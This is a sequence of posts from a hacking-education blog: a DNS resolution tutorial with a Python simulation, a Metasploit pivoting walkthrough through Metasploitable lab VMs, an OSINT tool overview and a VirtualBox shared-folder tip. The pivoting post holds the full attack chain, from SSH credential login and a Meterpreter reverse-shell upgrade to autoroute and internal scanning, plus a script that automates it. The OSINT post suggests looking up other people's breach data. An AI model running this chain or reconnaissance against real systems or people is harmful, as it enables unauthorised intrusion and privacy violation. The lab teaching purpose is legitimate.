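                "glue": {"a.gtld-servers.net.": "192.5.6.30", "b.gtld-servers.net.": "192.33.14.30"},
            }
        },
    },
    "192.5.6.30": {  # a.gtld-servers.net, serves "com."
        "zone": "com.",
        "records": {},
        "delegations": {
            "google.com.": {
                "ns": ["ns1.google.com.", "ns2.google.com."],
                "glue": {"ns1.google.com.": "216.239.32.10", "ns2.google.com.": "216.239.34.10"},
            }
        },
    },
    "216.239.32.10": {  # ns1.google.com, authoritative for "google.com."
        "zone": "google.com.",
        "records": {
            "google.com.": {"NS": ["ns1.google.com.", "ns2.google.com."]},
            "mail.google.com.": {"A": "142.250.178.5"},
        },
        "delegations": {},
    },
}
ROOT_HINTS = ["198.41.0.4"]  # the resolver's only built-in knowledge


def query(server_ip, qname, qtype):
    """One round trip to a single authoritative server: answer, referral or nxdomain."""
    server = SERVERS[server_ip]
    records = server["records"].get(qname, {})
    if qtype in records:
        return {"answer": records[qtype]}
    # Referral: the longest delegated child zone that qname falls under.
    for child in sorted(server["delegations"], key=len, reverse=True):
        if qname == child or qname.endswith("." + child):
            deleg = server["delegations"][child]
            return {"referral": child, "ns": deleg["ns"], "glue": deleg["glue"]}
    return {"nxdomain": True}


def resolve(qname, qtype="A", max_hops=10):
    """Iterative resolution from the root hints, following referrals via glue.
    Returns (answer or None, trail of (server, what it said))."""
    if not qname.endswith("."):
        qname += "."
    trail = []
    candidates = list(ROOT_HINTS)
    for _ in range(max_hops):
        server = candidates[0]
        reply = query(server, qname, qtype)
        if "answer" in reply:
            trail.append((server, "answer"))
            return reply["answer"], trail
        if "nxdomain" in reply:
            trail.append((server, "nxdomain"))
            return None, trail
        trail.append((server, "referral to " + reply["referral"]))
        # A real resolver would look up NS names that come without glue; here we
        # only follow the ones the referral gave addresses for.
        candidates = [reply["glue"][ns] for ns in reply["ns"] if ns in reply["glue"]]
        if not candidates:
            raise RuntimeError("referral without usable glue for " + reply["referral"])
    raise RuntimeError("too many referrals resolving " + qname)


if __name__ == "__main__":
    address, trail = resolve("mail.google.com")
    for server, what in trail:
        print(f"{server:>15}  {what}")
    print("mail.google.com ->", address)
```

The trail printed for mail.google.com is steps 2 to 7 of the list: root gives a referral to com., the .com server gives a referral to google.com., and ns1.google.com answers. Asking the .com server for google.com's NS records produces a referral rather than an answer, which is exactly the "No answer / Authoritative answers can be found from" output nslookup shows below.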

DNS Demonstration

Let's start at the top! Using nslookup we can query for the root nameservers. We set the query type to NS and then use a lone full stop to ask about the root zone. As you can see from the output below, nslookup returns all the root server names.

┌─[joe@Parrot]─[~]
└──╼ $nslookup
> set type=ns
> .
Server:		192.168.0.1
Address:	192.168.0.1#53
Non-authoritative answer:
.	nameserver = c.root-servers.net.
.	nameserver = d.root-servers.net.
.	nameserver = e.root-servers.net.
.	nameserver = f.root-servers.net.
.	nameserver = g.root-servers.net.
.	nameserver = h.root-servers.net.
.	nameserver = i.root-servers.net.
.	nameserver = j.root-servers.net.
.	nameserver = k.root-servers.net.
.	nameserver = l.root-servers.net.
.	nameserver = m.root-servers.net.
.	nameserver = a.root-servers.net.
.	nameserver = b.root-servers.net.
Authoritative answers can be found from:

In order to query the root servers directly, we need to find out their IP addresses. To do that we set the query type to A. An A record maps a hostname to an IPv4 address.

> set type=a
> a.root-servers.net
Server:		192.168.0.1
Address:	192.168.0.1#53
Non-authoritative answer:
Name:	a.root-servers.net
Address: 198.41.0.4

Next, we need to find the nameservers of the top-level domain. To do that, we first set our server to the IP address we just obtained from the A record query. Next, we set the record type to NS and query the com top-level domain. Ensure you put a full stop after it; the trailing dot makes the name absolute so nslookup doesn't append your local search domain.

> server 198.41.0.4
Default server: 198.41.0.4
Address: 198.41.0.4#53
> set type=ns
> com.
;; Truncated, retrying in TCP mode.
Server:		198.41.0.4
Address:	198.41.0.4#53
Non-authoritative answer:
*** Can't find com.: No answer
Authoritative answers can be found from:
com	nameserver = e.gtld-servers.net.
com	nameserver = b.gtld-servers.net.
com	nameserver = j.gtld-servers.net.
com	nameserver = m.gtld-servers.net.
com	nameserver = i.gtld-servers.net.
com	nameserver = f.gtld-servers.net.
com	nameserver = a.gtld-servers.net.
com	nameserver = g.gtld-servers.net.
com	nameserver = h.gtld-servers.net.
com	nameserver = l.gtld-servers.net.
com	nameserver = k.gtld-servers.net.
com	nameserver = c.gtld-servers.net.
com	nameserver = d.gtld-servers.net.
e.gtld-servers.net	internet address = 192.12.94.30
e.gtld-servers.net	has AAAA address 2001:502:1ca1::30
b.gtld-servers.net	internet address = 192.33.14.30
b.gtld-servers.net	has AAAA address 2001:503:231d::2:30
j.gtld-servers.net	internet address = 192.48.79.30
j.gtld-servers.net	has AAAA address 2001:502:7094::30
m.gtld-servers.net	internet address = 192.55.83.30
m.gtld-servers.net	has AAAA address 2001:501:b1f9::30
i.gtld-servers.net	internet address = 192.43.172.30
i.gtld-servers.net	has AAAA address 2001:503:39c1::30
f.gtld-servers.net	internet address = 192.35.51.30
f.gtld-servers.net	has AAAA address 2001:503:d414::30
a.gtld-servers.net	internet address = 192.5.6.30
a.gtld-servers.net	has AAAA address 2001:503:a83e::2:30
g.gtld-servers.net	internet address = 192.42.93.30
g.gtld-servers.net	has AAAA address 2001:503:eea3::30
h.gtld-servers.net	internet address = 192.54.112.30
h.gtld-servers.net	has AAAA address 2001:502:8cc::30
l.gtld-servers.net	internet address = 192.41.162.30
l.gtld-servers.net	has AAAA address 2001:500:d937::30
k.gtld-servers.net	internet address = 192.52.178.30
k.gtld-servers.net	has AAAA address 2001:503:d2d::30
c.gtld-servers.net	internet address = 192.26.92.30
c.gtld-servers.net	has AAAA address 2001:503:83eb::30
d.gtld-servers.net	internet address = 192.31.80.30
d.gtld-servers.net	has AAAA address 2001:500:856e::30

We get a lot of results, but we can point nslookup at any of these to ask about a specific domain's nameservers. Set the server to one of the IP addresses listed above, set the type to NS again, then choose a domain and punch it in to find its nameservers.

> server 192.5.6.30
Default server: 192.5.6.30
Address: 192.5.6.30#53
> set type=ns
> google.com.
Server:		192.5.6.30
Address:	192.5.6.30#53
Non-authoritative answer:
*** Can't find google.com.: No answer
Authoritative answers can be found from:
google.com	nameserver = ns2.google.com.
google.com	nameserver = ns1.google.com.
google.com	nameserver = ns3.google.com.
google.com	nameserver = ns4.google.com.
ns2.google.com	has AAAA address 2001:4860:4802:34::a
ns2.google.com	internet address = 216.239.34.10
ns1.google.com	has AAAA address 2001:4860:4802:32::a
ns1.google.com	internet address = 216.239.32.10
ns3.google.com	has AAAA address 2001:4860:4802:36::a
ns3.google.com	internet address = 216.239.36.10
ns4.google.com	has AAAA address 2001:4860:4802:38::a
ns4.google.com	internet address = 216.239.38.10

Finally, we can set our resolver to one of Google's nameservers and query it for A records such as mail. This could, of course, be scripted to run through each of these steps automatically and then brute force subdomains against the authoritative servers; Fierce is an existing tool that does exactly that.

> server 216.239.32.10
Default server: 216.239.32.10
Address: 216.239.32.10#53
> set type=a
> mail.google.com.
Server:		216.239.32.10
Address:	216.239.32.10#53
Name:	mail.google.com
Address: 142.250.178.5

Conclusion

I know this isn’t hacking but it’s essential to have a good understanding of the technologies that make the internet and the world wide web possible. There is a lot more to DNS than I’ve covered here. I haven’t discussed the various record types like MX, TXT, and CNAME that can be added to a zone file. I haven’t talked about propagation and caching.

DNS is such a fascinating subject to study because the problem is always DNS. Joking aside, without DNS we would have to remember the IP addresses of every website we wanted to visit. Oh, and those root servers at the top of the tree: if they go down then so does the internet. No more name resolution means anything developed to pull resources via domain names will no longer work. It's a terrifying prospect, especially with all the recent talk of cyber armageddon from the World Economic Forum. If someone with a zero-day were to get into those root servers and mess up the zone files then it would cause chaos. There is some redundancy: each of the 13 root server names is served by many anycast instances spread around the world, and resolvers cache what they learn, so losing a few instances goes unnoticed. Those 13 names are the unsung heroes of the internet and to them I say, thank you. Keep computing away you absolute legends.

Metasploit Pivoting To Hack Segregated VirtualBox Virtual Machines

Dear friend, welcome to HaXeZ. If you’re new to hacking and cybersecurity then you may have heard about pivoting. If you haven’t then let me explain. Pivoting is where you have compromised a host and discovered it is attached to another network. You then use that host to pivot your scans and attacks to hosts within that other network. For example, imagine you have just compromised a public-facing Web Application server. You check the network configuration and find that it is connected to an internal network. You can then use the compromised web application server to scan that internal network.

Pivoting

Pivoting Labs

I have seen some labs that allow you to practice pivoting but frankly not that many. Some require a complex setup process and others require paying a setup fee in order to access them. Then I had a light bulb moment. I’ve googled around and I haven’t seen many articles relating to using VirtualBox. VirtualBox has a number of network adaptor settings. One of these settings is a Host Only adapter. You can have multiple Virtual Machines configured to use this host-only adapter. You can also create multiple host-only adapters. My idea (I’m sure many others have had it) was to set up a lab in the following configuration.

  • Kali VM on the host only adapter 1.
  • Vulnerable VM 1 on the host only adapters 1 and 2.
  • Vulnerable VM 2 on the host only adapter 2.

The Kali VM wouldn’t be able to reach Vulnerable VM 2 unless it has exploited and is pivoting through Vulnerable VM 1.

Lab Set Up

Let’s get to work. First, I downloaded Metasploitable 2. I created a new virtual machine and called it Meta1. I then cloned that virtual machine and called it Meta2.

Pivoting - Clone Virtual Machine

Next, I used the host network manager to create a new host-only adapter.

Pivoting - Creating New Host-Only Adapter

After that, I configured the first network adapter on Meta1 to the first host-only adapter. Then I enabled and configured the second network adapter on Meta1 to the second host-only adapter. Finally, I configured the first network adapter on Meta2 to the second host-only adapter. I also made sure that my Kali Linux VM had its network set to the first host-only adapter.

Host Network Configuration

Host Configuration

I booted Meta1 and logged in (msfadmin|msfadmin) and noticed that it only had one interface up (eth0). In its current condition, it won’t be able to talk to the second network and thus the second target. To rectify this, I had a quick Google search and found this page in the Ubuntu documentation. The "configuring interface" section explains how to bring up an interface using DHCP.

# bring the second interface up, then request an address on it via DHCP
sudo ip link set dev eth1 up
sudo dhclient eth1
Interface eth1 Configured

Testing Pivoting

Now for the moment of truth: does this allow me to pivot from Meta1 to Meta2? First, we need to find the IP address of the host on the same network as us. You can do this by running ifconfig on the host or, the proper way, by performing an Nmap scan. Great, our host is online and has the IP address 192.168.56.106.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sP 192.168.56.0/24
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-10 13:51 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.1
Host is up (0.00028s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00013s latency).
MAC Address: 08:00:27:DE:8C:96 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.106
Host is up (0.00025s latency).
MAC Address: 08:00:27:82:70:32 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

Next, I needed a way to establish a connection to the host which would allow quick and easy setup of a pivot. Let’s launch Metasploit.

Metasploit

For simplicity, I chose the ssh_login module and configured it with the remote host’s IP address and the username and password.

msf6 auxiliary(scanner/ssh/ssh_login) > options
Module options (auxiliary/scanner/ssh/ssh_login):
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        
   BRUTEFORCE_SPEED  5                yes       
   DB_ALL_CREDS      false            no        
   DB_ALL_PASS       false            no        
   DB_ALL_USERS      false            no        
   DB_SKIP_EXISTING  none             no        
   PASSWORD          msfadmin         no        
   PASS_FILE                          no        
   RHOSTS            192.168.56.106   yes       
   RPORT             22               yes       
   STOP_ON_SUCCESS   false            yes       
   THREADS           1                yes       
   USERNAME          msfadmin         no       
   USERPASS_FILE                      no        
   USER_AS_PASS      false            no        
   USER_FILE                          no        
   VERBOSE           false            yes       

I then ran the exploit command and waited for it to complete. Great, we have established a connection to our host, but now we need to upgrade it to a Meterpreter shell. In order to do this, I first figured out which session it was using the sessions command.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
  Id  Name  Type         Information  Connection
  --  ----  ----         -----------  ----------
  1         shell linux  SSH root @   192.168.56.102:44505 -> 192.168.56.106:22 (192.168.56.106)
  3         shell linux  SSH root @   192.168.56.102:41553 -> 192.168.56.106:22 (192.168.56.106)

Next, I instructed Metasploit to upgrade the session to a Meterpreter session.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.102:4433 
[*] Sending stage (989032 bytes) to 192.168.56.106
[*] Command stager progress: 100.00% (773/773 bytes)

Creating The Pivot

To create the pivot, I jumped into the newly created Meterpreter session and ran the ifconfig command to see what available networks there were.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::

Interface  2
============
Name         : eth0
Hardware MAC : 08:00:27:82:70:32
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.56.106
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe82:7032
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface  3
============
Name         : eth1
Hardware MAC : 08:00:27:41:4f:ce
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.242.3
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe41:4fce
IPv6 Netmask : ffff:ffff:ffff:ffff::

Next, I sent the session to the background, selected the autoroute module, and configured it to use session 4.

msf6 post(multi/manage/autoroute) > options
Module options (post/multi/manage/autoroute):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       
   NETMASK  255.255.255.0    no       
   SESSION  4                yes       
   SUBNET                    no        

I then ran the module and it created the pivot for me.

Finding Hosts Through Pivoting

I then needed to find the target host. Of course, I could have run ifconfig on it, but where is the fun in that? I switched to the ping_sweep module and configured it to use session 4. I then set RHOSTS to the remote network range and ran the module.

msf6 post(multi/gather/ping_sweep) > options
Module options (post/multi/gather/ping_sweep):
   Name     Current Setting   Required  Description
   ----     ---------------   --------  -----------
   RHOSTS   192.168.242.0/24  yes       
   SESSION  4                 yes       
msf6 post(multi/gather/ping_sweep) > run
[*] Performing ping sweep for IP range 192.168.242.0/24
[+]     192.168.242.3 host found
[+]     192.168.242.2 host found
[+]     192.168.242.4 host found

Scanning Ports Through Pivoting

Sure enough, our host was there. Don’t ask me what the other ones are; I honestly don’t know and at this point, I’m too afraid to ask. Our target IP address was 192.168.242.4. So what’s next? Service discovery, obviously. I selected the portscan/tcp module and configured it to target the host. I ran the module and sure enough it found all the open ports on the host.

msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       
   DELAY        0                yes       
   JITTER       0                yes       
   PORTS        1-10000          yes       
   RHOSTS       192.168.242.4    yes       
   THREADS      1                yes       
   TIMEOUT      1000             yes       

msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.242.4:        - 192.168.242.4:25 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:23 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:21 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:22 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:53 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:80 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:111 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:139 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:445 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:512 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:513 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:514 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:1099 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:1524 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:2049 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:2121 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:3306 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:3632 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:5432 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:5900 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:6000 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:6667 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:6697 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:8009 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:8180 - TCP OPEN
[+] 192.168.242.4:        - 192.168.242.4:8787 - TCP OPEN
[*] 192.168.242.4:        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
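The whole chain above (ssh_login, upgrade to Meterpreter, autoroute, ping_sweep, portscan/tcp) can be replayed from a single msfconsole resource script once the lab is built. The shell script below generates that resource script; it is an added example of my own, not from the post or from the Metasploit project. Its defaults are the addresses used in this walkthrough (hop 192.168.56.106 with msfadmin/msfadmin, inner segment 192.168.242.0/24, target 192.168.242.4, handler on 192.168.56.102). Session IDs are only known at run time, so the `<ruby>` block reads them from `framework.sessions` after ssh_login has run and waits for the upgraded Meterpreter session to check in before routing through it.

```shell
#!/bin/sh
# Added example: generate an msfconsole resource script that replays the pivot chain.
# Assumed defaults come from this post: hop 192.168.56.106 (msfadmin/msfadmin),
# inner segment 192.168.242.0/24, final target 192.168.242.4, handler LHOST 192.168.56.102.
set -eu

# write_pivot_rc OUTFILE HOP USER PASS INNER_NET TARGET LHOST
write_pivot_rc() {
  out="$1"; hop="$2"; user="$3"; pass="$4"; inner="$5"; target="$6"; lhost="$7"
  cat > "$out" <<EOF
# generated by write_pivot_rc; run with: msfconsole -q -r $out
setg LHOST $lhost
use auxiliary/scanner/ssh/ssh_login
set RHOSTS $hop
set USERNAME $user
set PASSWORD $pass
set STOP_ON_SUCCESS true
run
<ruby>
# Session IDs are only known now: upgrade the newest shell and wait for Meterpreter.
shell_id = framework.sessions.keys.max
abort("ssh_login produced no session") if shell_id.nil?
run_single("sessions -u #{shell_id}")
met_id = nil
60.times do
  met_id = framework.sessions.keys.find { |id| framework.sessions[id].type == 'meterpreter' }
  break if met_id
  sleep 1
end
abort("no Meterpreter session appeared within 60s") if met_id.nil?
run_single("setg SESSION #{met_id}")
</ruby>
use post/multi/manage/autoroute
set CMD autoadd
run
use post/multi/gather/ping_sweep
set RHOSTS $inner
run
use auxiliary/scanner/portscan/tcp
set RHOSTS $target
set PORTS 1-10000
run
EOF
}

# Usage: sh make_pivot_rc.sh OUTFILE HOP USER PASS INNER_NET TARGET LHOST
# e.g.   sh make_pivot_rc.sh pivot.rc 192.168.56.106 msfadmin msfadmin 192.168.242.0/24 192.168.242.4 192.168.56.102
if [ "$#" -eq 7 ]; then
  write_pivot_rc "$@"
fi
```

`setg` is used for SESSION and LHOST so that every later module picks the values up from the global datastore; the `sessions -u` upgrade runs as a background job, which is why the script polls for a session of type `meterpreter` instead of assuming the next ID.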

Just to be on the safe side I tried to ping the host from my Kali VM to ensure I hadn’t messed something up. Sure enough, the network was unreachable.

┌──(kali㉿kali)-[~]
└─$ ping 192.168.242.4
ping: connect: Network is unreachable

Conclusion

So that’s what I’ve been doing today. I had this idea late last night when trying to get to sleep. It actually kept me awake for a while until I got up and wrote it down. This happens to me a lot but I do occasionally have some good ideas. Anyway, I really enjoyed this as I haven’t had much opportunity to experiment with pivoting. I’m actually shocked that I didn’t think of doing this sooner as it’s such an obvious method of practicing it. It was fun setting up, other than having a few errors with Metasploit due to some scripts being broken. Anyway, that’s me done for the day. I will record a video on this soon and upload it to the tube but until then.

Kind Regards

Hack To Learn: OSINT and Passive Reconnaissance

Dear Friend, welcome to HaXeZ where I want to talk about Open-source intelligence and passive reconnaissance. Passive Reconnaissance is one of the most important phases for successful hacking. Passive Reconnaissance uses Open Source Intelligence (OSINT) techniques to gather information about the target. To explain, we attempt to gather information about the target without interacting with it. For this reason, this article is going to cover a number of Passive Reconnaissance tools but there are plenty more out there.

Google Passive Reconnaissance

Google is an extremely powerful search engine. They didn’t become the number one search engine by luck. Usually, most people use Google by popping in a word and looking through the results. However, with a few modifications to your search terms, Google can be a powerful Passive Reconnaissance tool. In essence, using specific search operators can retrieve a wealth of information from Google. Additionally, the Exploit Database has a whole section dedicated to “Google Dorks” which can return potentially sensitive information about a target. Below are just a few examples.

Google Passive Reconnaissance

Maltego Passive Reconnaissance

Maltego is an open-source intelligence gathering application that allows you to gather information about a target domain. In short, it has a number of transforms that will automatically perform passive reconnaissance techniques. These transforms include DNS record look-ups from various sources, as well as email addresses, telephone numbers and various other bits of information. Overall, the interface provides an intuitive and friendly method of viewing the information retrieved. Within a few clicks, you can have a wealth of information that could allow you to find weaknesses in your target. Simply right-click an entity and choose from the list of transforms.

https://www.maltego.com/

Maltego Passive Reconnaissance

Have I Been Pwned?

Have I Been Pwned? is a web application that allows you to check whether the credentials of a mailbox have been compromised. Notably, it utilizes known database leaks and checks whether your email address was part of those leaks. These leaks are from various sources, including public leaks such as the LinkedIn database leak. Have I Been Pwned? was created for you to check your own email address, but there is nothing stopping you from checking other people’s too.

https://haveibeenpwned.com/

Have I Been Pwned Passive Reconnaissance

MXToolbox Passive Reconnaissance

MXToolBox is a web application that has a great number of tools. I initially discovered it while working in Technical Support for a hosting provider. It can be used to gather information about a domain’s DNS records. Furthermore, it has tools like ping, so if you want to see whether an IP is blocking you, you can check here rather than switching VPN locations. To cover all the tools would require an entire article, but this is a great tool for performing passive reconnaissance against a target.

https://mxtoolbox.com/

Mx Toolbox

Shodan Passive Reconnaissance

Shodan is a search engine for internet-connected devices. It can be used to find specific devices with specific operating systems and specific ports open. It has also indexed the banners that those ports display when connecting to them. Furthermore, it also checks to see whether those devices are using weak credentials. You can filter devices by country, city, organization, and domain; the list of filters is endless. If you wanted to find all FTP servers owned by a certain organization that support anonymous login, then you can.

https://www.shodan.io/

Shodan

OSINT Framework

The OSINT Framework is a web application that catalogs everything you could want to know about Open Source Intelligence gathering. It has a horizontal hierarchical structure: clicking one category reveals further categories and eventually a link to a resource. The resource will usually provide instructions or a tool for you to perform that specific type of OSINT. This web application has a lot to explore, more than can be covered in a single article.

https://osintframework.com/

OSINT Framework

Whois

Whois is a tool that can gather information about the registration of a domain. In some cases, it may tell you who registered it and include their contact details, but this will depend on the domain’s privacy settings. This information could include the domain owner’s telephone number as well as their address. Furthermore, the owner information, domain registration date, and expiry date can also be provided by the tool.

whois google.com
Whois

NSlookup

You can use the nslookup tool to retrieve information about a domain. The information can include the domain’s name servers, its IP address, its mail servers, and various other records. It can tell you how the domain is configured, provide certain records, and may identify potential targets.

nslookup
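Both whois and nslookup print free-form text, so the useful parts are easier to compare across domains once pulled out of the noise. Here is an added example of my own (not from the post) that summarises `whois` output using the standard gTLD field labels (Registrar, Creation Date, Registry Expiry Date, Name Server, Domain Status) and extracts the mail exchangers from `nslookup -type=mx` output. The two sample outputs embedded in the script are constructed for illustration, not captured from real lookups, and ccTLD registries use different labels. Besides the fields the post mentions, the summary reports whether the registrar transfer lock (clientTransferProhibited) is set, which is the first thing to check when reviewing your own domain's registration hygiene.

```shell
#!/bin/sh
# Added example: summarise whois and nslookup output for a domain.
# Field labels follow the ICANN gTLD whois format; ccTLD registries vary.
set -eu

# whois_summary: read `whois DOMAIN` output on stdin, print one KEY=VALUE line per field,
# the number of name servers, and whether a registrar transfer lock is set.
whois_summary() {
  awk '
    {
      sub(/\r$/, "")
      key = $0; sub(/^[ \t]*/, "", key); sub(/:.*$/, "", key)
      val = $0; sub(/^[^:]*:[ \t]*/, "", val)
    }
    key == "Domain Name" || key == "Registrar" || key == "Creation Date" ||
    key == "Registry Expiry Date" || key == "Registrant Organization" ||
    key == "Registrant Country" {
      if (!(key in seen)) { seen[key] = 1; printf "%s=%s\n", key, val }
    }
    key == "Name Server"   { ns++ }
    key == "Domain Status" { if (val ~ /clientTransferProhibited/) locked = 1 }
    END {
      printf "Name Servers=%d\n", ns
      printf "Transfer Lock=%s\n", (locked ? "yes" : "no")
    }'
}

# nslookup_mx: read `nslookup -type=mx DOMAIN` output on stdin, print "PRIORITY HOST" per MX
nslookup_mx() {
  awk '/mail exchanger = / { sub(/\.$/, "", $NF); print $(NF-1), $NF }'
}

# Constructed sample outputs (not real lookups) so the script runs offline.
SAMPLE_WHOIS='   Domain Name: EXAMPLE-LAB.TEST
   Registrar: Example Registrar, Inc.
   Updated Date: 2023-08-14T07:01:31Z
   Creation Date: 1995-08-14T04:00:00Z
   Registry Expiry Date: 2028-08-13T04:00:00Z
   Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Registrant Organization: Example Lab Ltd
   Registrant Country: GB
   Name Server: NS1.EXAMPLE-LAB.TEST
   Name Server: NS2.EXAMPLE-LAB.TEST
>>> Last update of whois database: 2024-01-01T00:00:00Z <<<'

SAMPLE_NSLOOKUP='Server:         192.0.2.53
Address:        192.0.2.53#53

Non-authoritative answer:
example-lab.test    mail exchanger = 10 mx1.example-lab.test.
example-lab.test    mail exchanger = 20 mx2.example-lab.test.'

# Run on the samples with: sh recon_parse.sh demo
# Real use:  whois example.com | whois_summary ; nslookup -type=mx example.com | nslookup_mx
if [ "${1:-}" = "demo" ]; then
  printf '%s\n' "$SAMPLE_WHOIS" | whois_summary
  printf '%s\n' "$SAMPLE_NSLOOKUP" | nslookup_mx
fi
```

The awk in whois_summary splits each line at the first colon only, so timestamps such as 2028-08-13T04:00:00Z survive intact; the `seen` array keeps the first occurrence of a field when a registrar echoes it twice.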

theHarvester

A tool that combines all of these techniques into one great command-line tool is theHarvester. theHarvester is a wrapper for other tools and can perform passive and active reconnaissance. It can use search engines to find subdomains and URLs. Additionally, it can use social media websites to find employee names and email addresses. To find the full list of sources utilized by theHarvester, head over to the developer’s GitHub page.

https://github.com/laramies/theHarvester

theHarvester

Conclusion

Passive reconnaissance can provide a wealth of information about a target that you are testing. While some of the information may be beyond the scope of the engagement, it can give you a good insight into their organization. The tools I’ve talked about above barely scrape the surface of the iceberg that is OSINT tools. Perhaps one day someone will create an all-in-one, web-based OSINT scanner and it will become what Nessus is to vulnerability scans. I’m fond of Maltego and theHarvester and think they do a fantastic job but would love more functionality and a simpler interface. Input your domain, tick the boxes of what information you want to discover and then wait for the report.

Tips And Tricks: Virtual Machine Shared Folder

Dear Friend, thank you for visiting HaXeZ. Today I want to talk about creating a shared folder for your Virtual Machine. Shared folders are a useful feature that allows you to share files between your base operating system and your Virtual Machine. While Virtual Machines do have a bidirectional clipboard that allows you to copy to and from each machine, a shared folder allows for easy access to resources such as wordlists and other large files. Furthermore, they can be particularly useful if you have limited disk space on your Virtual Machine.

Creating A Folder

In VirtualBox, this is a fairly simple process. First, you need to select the Virtual Machine that you want to add the shared folder to and click settings.

Shared Folder Settings

Once the settings menu opens you need to navigate to the Shared Folders section in the left-hand column.

Adding Shared Folder

Next, click the blue folder icon with the green plus sign and that will pop up a window with a number of options.

Folder Options

The Folder Path option lets you select where on your base Operating System you want your folder to be. Folder Name allows you to give your folder a specific name when accessing it on your Virtual Machine. The Read-Only option prevents you from making changes to any of the files in the shared directory. Do not tick this if you want to be able to modify your folders. Auto-mount ensures that the folder is mounted on your Virtual Machine once it boots. You want to enable this option. Mount Point specifies where on the Virtual Machine you want it to mount. If you leave this empty then it should default to the /media directory.

Shared Folder Mount

Accessing Shared Folder

With the settings saved, boot your Virtual Machine and log in to the Desktop Environment. Then launch your file manager or file explorer. On the left-hand side, you should see a Devices section containing your File System and your Shared Folder. If not, then it could be that you haven’t installed the VirtualBox Guest Additions.

File Explorer

Permissions Issues

If you can see the folder but aren’t able to access or create any files then it is likely due to user permissions. To resolve this, you need to add your user to the vboxsf group, which is the group VirtualBox uses to grant access to shared folders. This can be done by running the following command.

sudo adduser $USER vboxsf

You should now be able to access the shared folder. It is unlikely that you will need to reboot the machine, but if the problem persists then reboot and try again.
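A group change is only picked up by login sessions started after it, which is why the folder can still look locked straight after running adduser. The script below is an added example of my own (not from the post) that tells the three cases apart, active membership, membership on disk that this session has not picked up yet, and no membership at all, and offers a manual mount as a fallback. It assumes the share is named `share` and lives at /media/sf_share, the default location for an auto-mounted folder on a Linux guest; change SHARE and MOUNT_POINT to match your own settings.

```shell
#!/bin/sh
# Added example: diagnose why a VirtualBox shared folder is not accessible.
# Assumptions: share name "share", auto-mounted at /media/sf_share on a Linux guest.
set -eu

SHARE="${SHARE:-share}"
MOUNT_POINT="${MOUNT_POINT:-/media/sf_$SHARE}"

# in_session_group GROUP: is GROUP active for the current login session? This is what
# decides file access, and it is read from the session, not from /etc/group.
in_session_group() {
  id -nG | tr ' ' '\n' | grep -qx -- "$1"
}

# user_listed USER GROUP_LINE: parse one /etc/group line ("name:x:gid:m1,m2") for USER
user_listed() {
  printf '%s\n' "$2" | awk -F: -v u="$1" '
    { n = split($4, m, ","); for (i = 1; i <= n; i++) if (m[i] == u) found = 1 }
    END { exit found ? 0 : 1 }'
}

# configured_in_group USER GROUP: is USER listed in GROUP on disk? (applies at next login)
configured_in_group() {
  user_listed "$1" "$(getent group "$2" || true)"
}

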